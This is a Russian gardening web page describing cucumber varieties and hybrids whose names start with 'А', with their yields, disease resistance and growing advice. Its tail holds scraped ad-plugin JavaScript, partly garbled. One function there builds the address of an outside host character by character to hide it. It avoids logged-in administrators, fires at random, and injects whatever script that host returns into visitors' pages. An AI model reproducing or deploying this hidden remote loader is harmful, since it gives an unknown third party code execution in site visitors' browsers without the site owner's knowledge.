1 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Сорта огурцов на букву а анюта ажур аист

Лучшие сорта огурцов на букву А

Для получения отличного урожая важно найти качественный семенной материал. Рассматривая широкий ассортимент гибридов, представленных в торговых сетях, садоводы часто не могут определиться с выбором. Какие существуют лучшие сорта огурцов на букву А? Подробно рассмотрим описания и характеристики популярных вариантов.

Лучшие сорта огурцов на букву А

Импортная селекция

Семена зарубежных агрофирм всегда пользовались повышенным интересом у отечественных аграриев. Чаще всего сырье попадает к нам после многолетнего выращивания в Европе и Азии. Популярные новинки и проверенные лидеры позволят получить обильный урожай.

Анника

Анника Ф1 – это небольшие и аккуратные корнишоны, достигающие в длину 9 см. Поверхность плодов покрыта тонкой кожицей с мелкими пупырышками. Благодаря высоким вкусовым качествам продукция будет актуальной в свежем и в переработанном виде.

Лиана не нуждается в опылении, а с одного куста через 45 дней можно снять 5 кг плодов. Неприхотливый в уходе гибрид не боится распространенных недугов.

Амант

Амант Ф1 – это урожайное растение, с квадратного метра посадок снимают не менее 20 кг. Красивые корнишоны одной формы не теряют товарного вида при хранении и при перевозке. Приятный вкус с характерным огуречным ароматом, лишен горечи, специализирован для универсального употребления.

Новый голландский огурец, вегетационный период которого составляет от 40 до 45 суток. Партенокарпический куст не нуждается в опылении, отлично развивается в различных конструкциях и под открытым небом. При соблюдении минимальных требований по уходу, в каждом узелке формируется по 5 завязей-пучков. Не боится вирусов и распространенных грибковых хворей.

Ацтек

Голландский гибрид. Партенокарпическая лиана формирует в пазухах листьев от трех до пяти пучков-завязей. Культура не боится суточных перепадов температуры, обладает иммунитетом к распространенным болячкам и быстро регенерируется после стресса. Одинаково хорошо развивается как под открытым небом, так и в теплицах.

У гибрида Ацтек стабильный урожай, не зависящий от погодных условий. Зеленцы вырастают до 10 см, покрыты тонкой кожицей с темной «опушкой» и небольшими пупырышками. Приятный сладковатый вкус корнишонов делает их отличным вариантом для консервирования.

Аристократ

Великолепный сорт огурцов, выведенный южнокорейскими селекционерами. Ультраранний куст порадует первыми плодами намного раньше, чем польский Андрус Ф1 – спустя 35 дней после проклевывания из семян. Главной особенностью растения является удивительная живучесть и способность к регенерации. Лиана выдерживает перепады температуры, не боится болезней и ошибок агротехники.

У гибрида Аристократ F1 небольшие корнишоны, специализированные под консервацию. Аккуратные зеленцы покрыты тонкой кожицей с редкими, заметными пупырышками. Продукция долго хранится и без проблем переносит транспортировку.

Афина

Голландский сорт. Партенокарпическая лиана не боится опасных грибковых болезней и неприхотлива в уходе. По урожайности растение не уступает отечественным фаворитам Атаман и Адмирал.

У огурца Афина F1 отличные вкусовые и товарные характеристики. Яркий аромат без горечи подойдет для салатов и консервации. Зеленцы имеют одинаковую форму, мякоть покрыта тонкой шкуркой с едва заметными пупырышками.

Анулька

Растение устойчиво ко всем болезням

Популярный польский огурец, который по характеристикам напоминает отечественный сорт Сестрица Аленушка. Крепкая лиана созревает через семь недель после проклевывания из семян. Растение устойчиво ко всем опасным недугам и не боится перепада температур.

Характеризуется длительным и устойчивым плодоношением даже при неблагоприятных погодных условиях.

Анулька Ф1 – это вкусные плоды, лишенные генетически неприятной горечи. Гибрид нуждается в регулярном съеме зеленцов, иначе плоды могут перерасти и пожелтеть. Не теряет товарных характеристик при длительном хранении, используется для универсального употребления.

Ранние разновидности

Если хотите получить ранние плоды с сорта, тогда смотрите полное описание о нем на этикетке.

Арамис

Популярное растение, которое порадует ранним урожаем – через 35 дней после проклевывания из семян. Куст партенокарпический и не нуждается в опылителях: прекрасно развивается в условиях открытого грунта и пленочных конструкций. Имеет крепкий иммунитет к основным огуречным недугам и проств уходе.

Арамис Ф1 – это небольшие плоды одинаковой формы, покрытые тонкой кожицей с редкими пупырышками. Благодаря отличным вкусовым качествам, корнишоны употребляют в свежем и переработанном виде. Продукция долго лежит и без проблем транспортируется, сохраняя первоначальные характеристики.

Алексеич

Популярный отечественный сорт, не требующий наличия опылителей. От появления всходов и до первого съема плодов проходит от 38 до 45 дней. Среднерослая лиана с небольшим количеством побегов формирует в узлах пучки-завязи. Растение нетребовательно к уходу и имеет крепкий иммунитет к обеим разновидностям мучнистой росы.

Огурец Алексеич F1 или Алексеевич – это урожайный гибрид, с одного квадрата посадок которого получают не менее 13 кг продукции. Аккуратные корнишоны, покрытые тонкой, пупырчатой кожицей, достигают в длину 9 см. Благодаря селекционной работе, в мякоти отсутствует горечь. Плоды будут вкусны в свежем и переработанном виде.

Альпинист

Вы ищете урожайное решение для теплицы или подоконника? Рекомендуем обратить внимание на удивительное растение, которое без проблем развивается в условиях ограниченного объема почвы. Партенокарпический сорт плодоносит в течение всего вегетативного сезона и прекращает период с наступлением морозов. Не боится развиваться в условиях слабого освещения, обладает невосприимчивостью к огуречным болезням.

У гибрида Альпинист Ф1 длинные «тепличные» зеленцы, покрытые гладкой, мелкобугорчатой шкуркой. Из-за минимума пустоцветов урожай получается обильный. Мякоть сладковатая, с отсутствием характерной горечи. Продукция отлично хранится и транспортируется, специализирована для универсального употребления.

Алфавит

Данный сорт не боится перепадов температур

Интересны партенокарпический сорт, который растет в теплицах, пленочных тоннелях и в открытом грунте. Лиана обладает слабым ветвлением, а в каждом узле формируется по пять пучков-завязей. Устойчив к самым опасным заболеваниям, не боится перепадов температур. Большую часть урожая снимают в первые 35 дней после проклевывания, последующие периоды менее обильные.

У огурца Алфавит Ф1 небольшие плоды-корнишоны, вырастающие до 13 см в длину. Зеленцы покрыты тонкой кожицей с частой опушкой. В мякоти нет горечи, поэтому плоды подойдут для универсального употребления.

Алеша

Как и популярный Артек Ф1, гибрид относится к пчелоопыляемым разновидностям, которые специализированы для выращивания в открытом грунте. Крепкое растение не боится ошибок агротехники и не болеет распространенными недугами. Урожай снимают спустя 45 дней после появления первых ростков.

Алеша F1 – это небольшие огурчики, которые достигают в длину 11 см. Вкусные корнишоны покрыты тонкой кожицей с острыми пупырышками. Ароматная мякоть лишена горечи, поэтому продукцию употребляют в любом виде.

Арбузики колючие

Необычный декоративный сорт выведен отечественными селекционерами. Однолетняя вьющаяся лиана вырастает до двух метров в длину. Растение используют в качестве украшения для заборов и зданий. Красивые пятилопастные листики имеют тонкую «опушку» с нижней стороны.

Сорт Арбузики колючие нельзя употреблять в пищу: все части куста ядовиты, поэтому опасны для здоровья человека и животных. Цветет культура с середины лета, после чего начинают формироваться завязи. Внешне плоды похожи на популярную ягоду, покрытую тонкими шипами.

Растение, которое по характеристикам напоминает сорт Малютка-Анютка. Партенокарпический куст развивается одинаково хорошо как в теплице, так и в открытом грунте. От всходов и до первого съема плодов проходит 42 дня. Стрессоустойчивая лиана неприхотлива в уходе и устойчика к заболевания.

Ажур Ф1 – это гибрид, специализированный для употребления в свежем и переработанном виде. Небольшие короткие зеленцы достигают в длину 11 см. Вкусная, сладковатая мякоть лишена горечи и пустот. С одного квадратного метра посадок можно снять от 12 кг продукции.

Среднеранние разновидности

Чтобы получить много ароматных огурцов, важно правильно подобрать сорт. Плоды, которые созревают более 7 недель, успевают приобрести яркий, насыщенный вкус и отличаются большой урожайностью.

Антошка

Растение порадует вас хорошим урожаем

Сорт отечественной селекции, который относится к среднеранним разновидностям. От проклевывания из семян до наступления технической спелости проходит не менее 55 суток. Не требует опылителей, поэтому без проблем развивается в любом типе грунта. При соблюдении правил агротехники, с каждого квадрата посадок легко снимают не менее 14 кг. Культура обладает высокой устойчивостью к грибковым заболеваниям.

Гибрид Антошка выращивают как на зеленцы, так и на корнишоны и пикули. Продукция имеет отличные товарные и вкусовые характеристики, употребляется в консервации и солениях. Огурчики можно узнать по особым признакам:

  • веретенообразные;
  • кожица со светлыми полосками;
  • редкие пупырышки;
  • масса до 85 гр.

Среднеранний куст, который вступает в плодоношение через 7 недель. Пчелоопыляемый сорт культивируют как на улице, так и под пленочными сооружениями. Крепкая лиана не боится ошибок агротехники и практически не болеет.

У гибрида Аист аккуратные огурчики, длина которых в среднем 11 см, а вес — 90 гр. Корнишоны покрыты кожицей с плотной «опушкой» черного цвета. Не горчат. Нет пустот в мякоти. Подойдут для универсального использования.

Для северных регионов

Огурец является теплолюбивой культурой, поэтому не всегда приживается в прохладных областях. Алтайские сорта отличаются от обычных растений максимальной устойчивостью к низким температурам и крепким иммунитетом. Какие же гибриды самые лучшие для таких условий выращивания?

  1. Огурецы Алтай F1. Чешский куст универсального назначения относится к пчелоопыляемым видам. Зеленцы небольшие (до 10 см), покрыты тонкой кожицей с едва заметными бугорками.
  2. Андрюша. Партенокарпическая лиана с сильными регенерирующими характеристиками. Плоды снимают через 45 суток после проклевывания из семян.
  3. Огурец Алтайский. Крепкое растение, успевает созреть в течение 48 дней. Аккуратные корнишоны не желтеют и не горчат.

Особенностью региональных овощей является необходимость сбора урожая до определенного срока. Согласно народной примете, активный сбор начинается 17 августа, на праздник святой Авдотьи Огуречницы. К концу месяца ожидались обильные дожди и похолодание.

Чтобы получить щедрый и здоровый урожай, необходимо найти подходящий сорт. Среди широкого ассортимента отечественных и зарубежных огурцов можно выбрать сорт, соответствующий вашим требованиям.

Огурец обыкновенный ‘Аист’

Латинское название: cucumis sativus ‘aist’

Основной род : Огурец обыкновенный
Размер
  • от 10 до 12 см
Урожайность
  • небольшая
Срок созревания
  • среднеранний
Тип почвы
  • супесчаная
  • суглинки/глина
Способ выращивания
  • открытый грунт
Назначение плодов
  • универсальное
Устойчивость к болезням
  • высокая
Требования к ph почвы
  • нейтральная (ph 6.5-7)
  • слабощелочная (7-7.5)
Жизненная форма
  • однолетник
Форма плодов/стеблеплодов/корне- и клубнеплодов/кочанов
  • овальная
Размер плодов/стеблеплодов/корне- и клубнеплодов/кочанов
  • средние
Регион возделывания по оригинатору
  • Северо-Кавказский регион
Витаминность
  • средняя
Цвет плодов/корне- и клубнеплодов
    Цвет листьев/стеблеплодов/кочанов
      Цвет мякоти плодов/корне- и клубнеплодов
        Толщина корки
        • Не применимо
        Устойчивость к заморозкам
        • Не указано
        Засухоустойчивость
        • Не указано
        Декоративная ценность
        • Не применимо
        Вкус плодов
        • сладковатый
        Укрытие на зиму
        • Не применимо
        Устойчивость к вредителям
        • Не указано
        Габитус
        • рослый/раскидистый
        Лежкость
        • низкая
        Партенокарпический
        • Нет
        Характер ветвления
        • индетерминантные
        Плотность и характер мякоти
        • Нежная
        • Сочная

        Развернуть все свойства

        Описание растения:

        Огурец обыкновенный ‘Аист’ — сорт, полученный на Крымской опытной-селекционной станции Всероссийского НИИ растениеводства. Допущен к использованию по Северо-Кавказскому региону в 1994 году.

        Рекомендуется для выращивания в открытом грунте. Сорт ценится за высокий выход товарной продукции.

        Размеры и форма роста:

        Сорт ‘Аист’ представлен плетистыми растениями со стеблями индетерминантного типа. Длина главного стебля 170–210 см., количество плетей первого порядка 5–7, второго — 1–5. Лист овальной формы, слегка рассеченный, почти цельнокрайний, с гладкой поверхностью, зеленого цвета.

        Завязь овально-цилиндрическая, бугорчатая. Опушение редкое, сложное, черное.

        Тыквина:

        Размер, форма и цвет:

        Зеленец овальной формы, длиной 11.2–12.2 см., диаметром 3.8–4.1 см., массой 80–100 г. Окраска зеленая с размазанными полосами, доходящими до 1/2 длины плода. Поверхность крупнобугорчатая, бугорки редкие. На поперечном разрезе зеленец округло-трехгранной формы.

        Вкусовые качества свежих и консервированных плодов хорошие.

        Сроки созревания и урожайность:

        Огурец обыкновенный ‘Аист’ относится к среднеранним сортам. Опыляется пчелами. Период от полных всходов до первого сбора урожая — 54–57 дней. Товарная урожайность 0.9–1.1 кг/м 2 .

        Устойчивость к болезням:

        Сорт достаточно устойчив к пероноспорозу и мучнистой росе. Восприимчивость к ложной мучнистой росе слабая.

        Способы применения:

        Применяется как в свежем виде, так и для консервирования и засолки.

        Выращивание и уход за сортом огурцов «Аист»

        Основной заботой огородников в весенний период является выращивание различных культурных растений, которые будут обогащать организм витаминами на протяжении всего года. Огурцы тоже входят в число таких растений, поэтому подбирая подходящий сорт, огородники отдают предпочтение тем, которые характеризуются высокой урожайностью и устойчивостью к воздействию болезней и вредителей.

        Огурец Аист: описание сорта

        «Аист» — это среднеспелый сорт огурцов, который создан для выращивания в открытой почве и теплицах. Опыление растение осуществляется за счет деятельности пчел.

        Высевание семя производится вначале мая, а высадка рассады в почву осуществляется уже в конце мая или в начале июня.

        Растение широко используется для употребления в свежем виде, для засолки и консервации.

        Характеристика сорта

        Сорт огурцов «Аист» выделяется наличием следующих характерных черт:

        • относится к среднеспелым сортам, от высевания семян до начала плодоношения проходит от 49 до 52 дней;
        • растение опыляется пчелами;
        • кустарник среднерослый, длина главного стебля может варьироваться от 170 до 210 сантиметров;
        • форма плода овально-цилиндрическая;
        • цвет огурца темно-зеленый, присутствуют светлые размытые полосы, которые занимают ½ или 1/3 длины плода;
        • присутствует чёрное сплошное опушение;
        • длина плода варьируется от 9 до 14 сантиметров;
        • вес одного огурца составляет от 75 до 105 грамм;
        • зеленцы имеют приятный вкус, полностью отсутствует горечь;
        • плоды на протяжении длительного времени не подвергаются пожелтению;
        • наблюдается комплексная устойчивость к различным заболеваниям.

        Выращивание

        Посадка описываемого сорта огурцов может осуществляться рассадным и безрассадным способом:

        • В первом случае, высевание семян сорта огурцов «Аист» необходим осуществлять за месяц до необходимой высадки рассады в открытую почву. Перед высеванием семян их нужно на несколько суток замочить в любом стимуляторе роста, это обеспечит более быстрое прорастание ростков.
        • Во втором случае, нужно осуществлять посев в почву уже проросших или набухших семян. При этом верхний слой грунта должен иметь температуру от 13 до 15 градусов. Если осуществить высадку семян при более низких температурах тогда можно будет просто наблюдать их разложение. Семена помещаются на глубину 1,5-2 сантиметра, а плотность рассадки составляет 5-7 растений на один квадратный метр.

        Рекомендуется высаживать рядом несколько разных сортов огурцов, это увеличит опыляемость растения и обеспечит более высокий уровень урожайности.

        Относительно почвы, то высадку нужно осуществлять в плодородный грунт, хорошо удерживающий влагу:

        1. В результате того, что сорт имеет небольшую корневую систему, то будет довольно удобно осуществлять выращивание растения, внося органические удобрения локальным путем — в посадочные траншеи или ямы.
        2. Перед высадкой огурцов в почву нужно выкопать траншею или лунку глубиной около 40 сантиметров, уложить на ее дно слой органических удобрений, перемешать с грунтом и сверху засыпать уже чистой почвой.
        3. Во время разложения органика выделяет большое количество тепла, которое поспособствует ускорению роста и развития растений.
        4. Участок, где будут выращиваться огурцы должен хорошо освещаться солнцем и быть защищенным от сквозняков.

        Оптимальной температурой для выращивания огурцов сорта «Аист» считается показатель от 23 до 30 градусов. Если температурные показатели составляют менее 15 градусов, то можно наблюдать угнетение роста растения, независимо от его стадии развития.

        Уход за описываемым сортом огурцов включает в себя следующие манипуляции:

        Популярный Крымский огурец Аист, наполненный витаминами: полное описание сорта

        Аист – надежный сорт от отечественных селекционеров. Огурец предназначен для посадок в укрывных условиях и на открытых грядках. Он нравится огородникам и земледельцам за отличные товарные и вкусовые свойства, аппетитную хрусткость и аромат. Активно опыляется пчелами, первые плоды собирают уже через 48-50 дней.

        Место посадки Сроки созревания Способ применения Длина плода Группа Гладкость плода Способ опыления
        Универсальный Среднеранний (46-55 дней) Универсальный Средние — от 10 до 15 см Гибрид Сильнобугристые Пчелоопыляемый

        Описание и характеристика сорта

        Аист плодоносит ровными зеленцами среднего размера. Кусты растут по индетерминантному типу, для них характерны такие особенности:

        • высота основного побега 1,7-2 м;
        • ветвей первого порядка в пределах 5-7;
        • плетей второго уровня от 1 до 5;
        • листья крупные, цельнокрайние;
        • окраска насыщенно-зеленая.

        Созревание начинается через 54-57 суток от первых всходов. Сорт входит в среднераннюю группу.

        Активно культивируется на открытых грядках в умеренных и южных широтах.

        Описание и характеристика зеленцев:

        • форма цилиндрическая вытянуто-овальная;
        • длина 11-12 см;
        • диаметр 3,8-4 см;
        • средняя масса 85-100 г;
        • окраска интенсивно-зеленая;
        • полосы занимают половину плода;
        • бугорки массивные, но редкие;
        • поперечный срез напоминает трехгранную форму.

        Преимущества и недостатки

        • переносимость неблагоприятных погодных факторов;
        • плоды длительно не желтеют;
        • крепкий иммунитет к различным патогенам;
        • отличный вкус и товарность.

        Минусы:

        • потребность в питательном плодородном грунте;
        • необходимость поливов.

        Урожайность

        Товарная продуктивность — 0,9-1,1 кг с 1 м2. Плоды одинаковых размеров, ровные.

        Посадка

        Землю подбирают плодородную, легкую. В состав включают:

        Грядки располагают под солнцем, возможно легкое затенение. Копают траншеи по 40 см глубиной, заполняют органическими материалами, смешанными с землей. При разложении будет выделяться нужное тепло для роста и развития огурцов.

        Сажается 2 способами:

        1. Через рассаду. За 30 дней до пересадки на стационарное место сеют семена. Предварительно замачивают в Гетероауксине, Агате или Цирконе для активации роста.
        2. Сажать непосредственно на грядку. Земля должна прогреться до 13-14 градусов. Высевают набухший или проросший семенной материал. Глубина расположения — 1,5-2 см. Дистанция между ямками 30 см. На 1 м2 размещают 5-7 кустиков.

        Выращивание и уход

        Для Аиста оптимальные условия для культивации:

        • температура 23-30 градусов;
        • отсутствие сквозняков;
        • обилие света.

        Обязательный уход включает:

        • фиксацию к опоре;
        • регулярные поливы теплой водой;
        • подкормки 3-4 раза за сезон;
        • удаление пасынков из первых 3-4 листочков.

        Особенности хранения

        7-10 дней хранят в холодильнике.

        Болезни и вредители

        Опасность для Аиста представляют такие болезни:

        • гниль белая и корневая;
        • ложная мучнистая роса;
        • мучнистая роса.

        Гибрид огурцов с хорошим иммунитетом «Ажур F1»: фото, видео, описание, посадка, характеристика, урожайность, отзывы

        Дачникам, желающим получить качественный урожай зеленцов, следует поближе ознакомиться с характеристиками гибрида «Ажур», схожими с «Малюткой-Анюткой».

        Происхождение сорта огурцов «Ажур ф1»

        Над созданием гибрида «Ажур» трудились ученые-специалисты ООО «Агрофирмы Седек» (г. Домодедово), по совместительству являющейся оригинатором и обладателем патента. В 2012 году гибрид официально зарегистрирован в государственном реестре селекционных достижений Российской Федерации.

        Описание сорта

        «Ажур» — гибрид с ранним сроком созревания. Первые зеленцы полностью созревают спустя 40-45 дней после появления первых побегов.

        Плоды:

        • Цилиндрической формы;
        • Окраска варьируется от зеленой до темно-зеленой, с довольно короткими полосками;
        • С кожурой покрытой бугорками крупных размеров, с густым опушением и белыми шипами;
        • С плотной, хрустящей, ароматной мякотью. Горечь отсутствует;
        • Длина — от 8 до 11 см;
        • Средняя масса — от 70 до 90 грамм.

        Кусты:

        • Индетерминантного типа, средневетвистые, с мощной корневой системой;
        • Преимущественно с женским типом цветения;
        • Листья средних размеров, темно-зеленой окраски, со слабоморщинистой структурой;
        • В каждом листовом узле образуется от 1 до 3 завязей.

        Достоинства и недостатки

        Гибрид «Ажур» можно охарактеризовать ниже перечисленными преимуществами:

        • Ранним сроком созревания;
        • Стрессоустойчивостью;
        • Способностью к самоопылению;
        • Обильным и длительным плодоношением;
        • Возможностью выращивания в промышленных масштабах;
        • Невосприимчивостью к основным заболеваниям огурцов;
        • Высокими вкусовыми характеристиками;
        • Повышенной устойчивостью к температурным перепадам;
        • Теневыносливостью;
        • Высокой урожайностью;
        • Пригодностью к длительному хранению;
        • Возможностью транспортировки на дальние расстояния;
        • Прекрасным товарным внешним видом;
        • Универсальностью назначением.

        Применение

        Огурчики употребляют в свежем виде, используют в качестве ингредиента при приготовлении разнообразных салатов. Также зеленцы засаливают, маринуют и консервируют.

        Агротехника или правильное выращивание

        В грунт допускается высевание как сухого семенного материала, так и в пророщенном либо замоченном виде.

        Посев семян на рассаду осуществляют в апреле, заглубляя на 1-2 см. Выращивают рассаду в индивидуальных стаканчиках, наполненных питательной почвенной смесью, в состав которой входят дерн, биогумус, торф и песок. По мере роста рассаду регулярно поливают, а также дважды подкармливают. Высаживают огуречные саженцы руководствуясь схемой 50х50 см.

        Основные мероприятия по уходу за гибридом «Ажур»:

        • Периодичность поливов — раз в 5 дней, в засушливый период посадки следует орошать чаще. На 1 м 2 расходуют до 10 литров воды. Поливают в вечерние часы, используя теплую, отстоянную воду;
        • Чтобы на поверхности грунта не образовывалась корка после оросительных процедур обязательно рыхлят грунт. Рыхлить нужно с осторожностью, чтобы не травмировать поверхностно расположенную корневую систему;
        • Мульчируют грунт соломой, свежескошенным сеном либо перепревшими опилками;
        • За весь вегетационный период 3-4 раза подкармливают. Обязательно чередуют внесение минеральных комплексов и органических удобрений;
        • По мере роста растения стебель подвязывают к горизонтальной шпалере;
        • Формирование куста осуществляют в один стебель, прищипывая верхушку основного стебля по достижению шпалеры.

        Болезни и вредители

        Гибрид «Ажур» обладает хорошим иммунитетом к характерным огуречным заболеваниям, а именно к вирусу огуречной мозаики, мучнистой росе. В качестве профилактических мероприятий посадки периодически опрыскивают медесодержащими препаратами.

        Урожайность

        В среднем урожайность с 1 м 2 составляет от 14 до 16 кг. Показатель товарной урожайности при выращивании в пленочном необогреваемом тепличном сооружении достигает до 12,8 кг с 1 м 2 .

        В каких регионах лучше выращивать?

        Гибрид «Ажур» допущен к выращиванию в следующих регионах Российской Федерации:

        • Северном;
        • Северо-Западном;
        • Северо-Кавказском;
        • Центральном;
        • Волго-Вятском;
        • Центрально-Черноземном;
        • Средневолжском;
        • Западно-Сибирском;
        • Дальневосточном;
        • Уральском;
        • Восточно-Сибирском;
        • Нижневолжском.

        Культивировать гибрид «Ажур» можно как в незащищенном грунте, так и под пленочных укрытиях.

        Отзывы о сорте от тех, кто сажал

        О гибриде «Ажур» овощеводы оставляют только восторженные отзывы на различных форумах. Из достоинств гибрида огородники выделяют партенокарпичность, высокую урожайность, прекрасные вкусовые и товарные характеристики.

        Чтобы в конце огородного сезона наслаждаться обильным и качественным урожаем зеленцов необходимо выбрать подходящий сорт либо гибрид. Из большого ассортимента огуречных сортов и гибридов отечественной и зарубежной селекции «Ажур»полностью соответствует всем требованиям огородников.

        Как формировать огурцы:

        Ссылка на основную публикацию
        Adblock
        detector
        ":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
        '+c+"
        "),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
        Закрыть через '+o.how.outgoing.timer_count+"
        ":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
        '+c+"
        ");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
        '),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
        "],tbody:[1,"","
        "],colgroup:[2,"","
        "],col:[3,"","
        "],tr:[2,"","
        "],td:[3,"","
        "],th:[3,"","
        "],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
        '+a+" через "+o+'
        '+n+'
        ',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
        ');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};